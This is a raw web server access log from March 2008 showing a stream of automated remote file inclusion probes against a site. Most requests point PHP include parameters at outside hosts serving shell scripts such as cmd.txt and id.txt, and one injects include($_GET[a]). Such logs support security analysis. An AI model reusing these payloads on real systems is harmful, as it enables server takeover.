81.2.252.15 - - [23/Mar/2008:08:40:12 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:08:40:26 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.176 - - [23/Mar/2008:08:40:27 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:40:27 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:40:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:40:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:40:46 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:40:56 -0700] "GET /skin/zero_vote.php/skin=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:40:57 -0700] "GET /logs/skin/zero_vote.php/skin=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:40:57 -0700] "GET /logs/access_080131.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:41:16 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/detail.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:41:17 -0700] "GET //modules/TotalCalendar/detail.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:41:18 -0700] "GET /logs//modules/TotalCalendar/detail.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:08:41:20 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:41:32 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:41:41 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:41:45 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.234.34 - - [23/Mar/2008:08:42:30 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aband.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:42:52 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:42:55 -0700] "GET /logs/access_080124.log//modules/TotalCalendar/detail.php?inc_dir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:11 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.150.203 - - [23/Mar/2008:08:43:13 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.75.150.203 - - [23/Mar/2008:08:43:13 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
62.149.175.53 - - [23/Mar/2008:08:43:23 -0700] "GET /errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.149.175.53 - - [23/Mar/2008:08:43:23 -0700] "GET /logs/errors.php?error=http://www.maak-moet.de/test??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:43:34 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:43:34 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:43:37 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:43:53 -0700] "GET /logs/access_080225.log//components/com_pollxt/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:58 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:58 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:43:58 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:44:42 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:44:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:44:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:44:56 -0700] "GET /logs/access_080220.log//admin.php?include_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:44:57 -0700] "GET //admin.php?include_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:44:58 -0700] "GET /logs//admin.php?include_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:45:06 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:45:09 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.102.106.10 - - [23/Mar/2008:08:45:09 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:45:10 -0700] "GET /logs/access_080126.log/modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:45:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:45:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:45:10 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:45:24 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:45:46 -0700] "GET /logs/access_080306.log/inc/cmses/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:45:46 -0700] "GET /inc/cmses/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:45:47 -0700] "GET /logs/inc/cmses/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:46:08 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:46:08 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:46:57 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:46:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:46:58 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:47:23 -0700] "GET /logs/access_080124.log//skin/zero_vote/ask_password.php?dir=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:47:24 -0700] "GET /logs/access_071226.log//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:47:28 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [23/Mar/2008:08:47:32 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:47:43 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:48:40 -0700] "GET /logs/access_080223.log/inc/cmses/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.184.192 - - [23/Mar/2008:08:50:22 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:08:51:16 -0700] "GET //popup_window.php?site_isp_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
77.245.149.70 - - [23/Mar/2008:08:51:17 -0700] "GET /logs//popup_window.php?site_isp_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:51:18 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.133.133 - - [23/Mar/2008:08:51:32 -0700] "GET //sources/template.php?CONFIG[main_path]=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
204.15.133.133 - - [23/Mar/2008:08:51:32 -0700] "GET /logs//sources/template.php?CONFIG[main_path]=http://66.194.79.1/~holeshot/form/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.207.204.13 - - [23/Mar/2008:08:51:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
64.207.204.13 - - [23/Mar/2008:08:51:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://bnb-chambresdhotes.ch/components/com_easygallery/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:51:57 -0700] "GET /logs/access_071231.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:08:52:03 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:52:39 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [23/Mar/2008:08:52:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.141.48.206 - - [23/Mar/2008:08:52:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.14.84.240 - - [23/Mar/2008:08:53:03 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.eudipharm.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.14.84.240 - - [23/Mar/2008:08:53:04 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.eudipharm.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
70.84.7.82 - - [23/Mar/2008:08:53:04 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.76.157.205 - - [23/Mar/2008:08:53:12 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.76.157.205 - - [23/Mar/2008:08:53:19 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.67.184 - - [23/Mar/2008:08:53:55 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [23/Mar/2008:08:54:34 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.146.225.109 - - [23/Mar/2008:08:54:34 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:56:14 -0700] "GET /logs/access_071229.log/detail.php?table=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:56:15 -0700] "GET /detail.php?table=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.213.36 - - [23/Mar/2008:08:56:15 -0700] "GET /modifyform.html?code=http://www.fansvictorvaldes.es//components/com_rwcards/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:56:15 -0700] "GET /logs/detail.php?table=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:56:33 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:56:33 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.214.233 - - [23/Mar/2008:08:56:57 -0700] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [23/Mar/2008:08:57:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [23/Mar/2008:08:57:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:57:27 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [23/Mar/2008:08:57:39 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [23/Mar/2008:08:57:39 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.35 - - [23/Mar/2008:08:57:48 -0700] "GET //main.php?sayfa=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.184 - - [23/Mar/2008:08:57:53 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/lingaputra/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.56 - - [23/Mar/2008:08:57:57 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [23/Mar/2008:08:58:07 -0700] "GET /components/com_joomlaxplorer/extplorer.php?mosConfig_absolute_path=http://nixelated.com/site/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:08:58:17 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:08:58:17 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.179.215 - - [23/Mar/2008:08:58:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.3 - - [23/Mar/2008:08:58:22 -0700] "GET /logs/access_071202.log//components/com_users/layout.php?mosConfig_absolute_path=http://bandas.com.ar/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [23/Mar/2008:08:58:23 -0700] "GET /logs//components/com_users/layout.php?mosConfig_absolute_path=http://bandas.com.ar/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [23/Mar/2008:08:58:42 -0700] "GET /logs/access_080204.log//modules/Neos_Chronos/header.php?base_folder=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
